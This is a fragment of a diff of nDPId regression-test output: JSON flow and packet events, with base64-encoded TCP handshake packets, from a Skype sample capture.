-00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2117,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1431970707176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970707176,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHapD3vnr+RomKASOJCFFQAAAgQFrAQCCAo\/p5PEPjKf5wEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2118,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431970707176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970707176,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qAZAAEAG9C3AqAEi1KEIJMh2NFCv5GiYqQ976IAQECzb9gAAAQEICj4yoDA\/p5PE"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1847,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970697478,"flow_last_seen":1431970697478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970697478,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1847,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431970697478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697478,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/r1AAEAGxRPAqAEilQ0gD8hrNFBkkG+ZAAAAALAC\/\/82XwAAAgQFtAEDAwUBAQgKPjJ6nwAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1848,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431970697521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970697521,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyGvw2U4ZZJBvmqASOJDuMgAAAgQFrAQCCAo\/iaIXPjJ6nwEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1849,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431970697522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05GtAAEAG33HAqAEilQ0gD8hrNFBkkG+a8NlOGoAQECxFMgAAAQEICj4yeso\/iaIX"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970697522,"flow_last_seen":1431970697522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970697522,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1431970697522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJ8VAAEAGrFLAqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9fxAAAAgQFtAEDAwUBAQgKPjJ6ygAAAAAEAgAA"} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431970697921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697921,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXadAAEAGdnDAqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/mhAAAAgQFtAEDAwUBAQgKPjJ8VgAAAAAEAgAA"} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1431970698527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970698527,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIalAAEAGsm7AqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9b2wAAAgQFtAEDAwUBAQgKPjJ+swAAAAAEAgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970698661,"flow_last_seen":1431970698661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970698661,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1431970698661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970698661,"pkt":"0NQSxnP1PBXCt3IOCABFAABAL8NAAEAGlA7AqAEilQ0gD8htNFBZKlAPAAAAALAC\/\/9ctAAAAgQFtAEDAwUBAQgKPjJ\/OAAAAAAEAgAA"} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1431970698714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970698714,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyG0MzUGLWSpQEKASOJAD+QAAAgQFrAQCCAo\/iaNBPjJ\/OAEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1431970698714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970698714,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0OGtAAEAGi3LAqAEilQ0gD8htNFBZKlAQDM1BjIAQECxa7wAAAQEICj4yf2w\/iaNB"} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1896,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1431970699535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970699535,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1tBAAEAG\/UbAqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9X8gAAAgQFtAEDAwUBAQgKPjKCnAAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970699896,"flow_last_seen":1431970699896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970699896,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1431970699896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970699896,"pkt":"0NQSxnP1PBXCt3IOCABFAABAq+JAAEAGjwvAqAEiXU\/gsMhvOKrhhkW1AAAAALAC\/\/9MqQAAAgQFtAEDAwUBAQgKPjKEAQAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1431970699988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970699988,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGRPJdT+CwwKgBIjiqyG99aSIL4YZFtqASOJC3HAAAAgQFrAQCCAoANM5PPjKEAQEDAwU="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1431970699988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970699988,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MxRAAEAGB+bAqAEiXU\/gsMhvOKrhhkW2fWkiDIAQECwN6AAAAQEICj4yhFwANM5P"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1917,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970700273,"flow_last_seen":1431970700273,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970700273,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1917,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1431970700273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970700273,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXG9AAEAGZ2LAqAEilQ0gD8hwNFCdm737AAAAALAC\/\/+kFAAAAgQFtAEDAwUBAQgKPjKFdwAAAAAEAgAA"} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1920,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431970700316,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970700316,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHC8tiDYnZu9\/KASOJDXAgAAAgQFrAQCCAo\/i4hfPjKFdwEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":3,"flow_last_seen":1431970700316,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970700316,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VdAAEAG0oXAqAEilQ0gD8hwNFCdm738vLYg2YAQECwuAwAAAQEICj4yhaE\/i4hf"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701461,"flow_last_seen":1431970701461,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701461,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431970701461,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970701461,"pkt":"0NQSxnP1PBXCt3IOCABFAABABNpAAEAGl07AqAEi1KEIJMhxNFBceQzyAAAAALAC\/\/9qAAAAAgQFtAEDAwUBAQgKPjKKDQAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701508,"flow_last_seen":1431970701508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701508,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431970701508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970701508,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+6xAAEAGP0HAqAEiXU\/gsMhyOKrDZAILAAAAALAC\/\/+oNwAAAgQFtAEDAwUBAQgKPjKKPAAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1959,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431970701535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970701535,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHGqbrB+XHkM86ASOJCJjwAAAgQFrAQCCAo\/pB5HPjKKDQEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1960,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431970701535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970701535,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GjJAAEAGggLAqAEi1KEIJMhxNFBceQzzqm6wf4AQECzgbwAAAQEICj4yilc\/pB5H"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1965,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431970701599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970701599,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGRPJdT+CwwKgBIjiqyHKomFMrw2QCDKASOJC0yAAAAgQFrAQCCAoANM\/iPjKKPAEDAwU="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1966,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431970701599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970701599,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03YRAAEAGXXXAqAEiXU\/gsMhyOKrDZAIMqJhTLIAQECwLlgAAAQEICj4yipUANM\/i"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970703073,"flow_last_seen":1431970703073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970703073,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431970703073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970703073,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2zBAAEAGwPfAqAEi1KEIJMhzNFD26tn9AAAAALAC\/\/\/8RgAAAgQFtAEDAwUBAQgKPjKQRwAAAAAEAgAA"} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2017,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431970703145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970703145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHPVGwsc9urZ\/qASOJBaugAAAgQFrAQCCAo\/nFogPjKQRwEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431970703145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970703145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QUdAAEAGWu3AqAEi1KEIJMhzNFD26tn+1RsLHYAQECyxnAAAAQEICj4ykI8\/nFog"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970704329,"flow_last_seen":1431970704329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970704329,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431970704329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970704329,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHThAAEAGppnAqAEilQ0gD8h0NFB7qA8CAAAAALAC\/\/9lUQAAAgQFtAEDAwUBAQgKPjKVIwAAAAAEAgAA"} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431970704371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970704371,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHQNAtU7e6gPA6ASOJA1ewAAAgQFrAQCCAo\/gOZ\/PjKVIwEDAwk="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1431970704371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970704371,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+SJAAEAGyrrAqAEilQ0gD8h0NFB7qA8DDQLVPIAQECyMewAAAQEICj4ylU0\/gOZ\/"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970705942,"flow_last_seen":1431970705942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970705942,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1431970705942,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970705942,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIgJAAEAGoc\/AqAEilQ0gD8h1NFDRK91BAAAAALAC\/\/87SwAAAgQFtAEDAwUBAQgKPjKbZQAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1431970705984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970705984,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHXO868x0SvdQqASOJBt+QAAAgQFrAQCCAo\/gOgTPjKbZQEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431970705984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970705984,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iDxAAEAGO6HAqAEilQ0gD8h1NFDRK91CzvOvMoAQECzE+QAAAQEICj4ym48\/gOgT"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707102,"flow_last_seen":1431970707102,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970707102,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1431970707102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970707102,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/2lAAEAGnL7AqAEi1KEIJMh2NFCv5GiXAAAAALAC\/\/+lEAAAAgQFtAEDAwUBAQgKPjKf5wAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2117,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1431970707176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970707176,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHapD3vnr+RomKASOJCFFQAAAgQFrAQCCAo\/p5PEPjKf5wEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2118,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431970707176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970707176,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qAZAAEAG9C3AqAEi1KEIJMh2NFCv5GiYqQ976IAQECzb9gAAAQEICj4yoDA\/p5PE"} 